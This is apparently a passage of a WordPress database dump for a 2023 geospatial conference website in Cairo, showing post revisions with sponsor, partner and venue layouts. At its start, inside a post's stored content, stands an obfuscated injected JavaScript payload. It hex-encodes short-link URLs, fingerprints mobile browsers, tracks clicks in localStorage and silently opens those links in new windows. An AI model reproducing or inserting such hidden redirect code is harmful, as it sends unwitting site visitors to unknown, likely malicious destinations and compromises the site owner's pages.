_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 02:54:32','2023-08-16 02:54:32','',3066,'https://gsw2023.com/?p=5272',0,'revision','',0),
(5273,1,'2023-08-16 02:54:58','2023-08-16 02:54:58','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692154390990{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h4>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 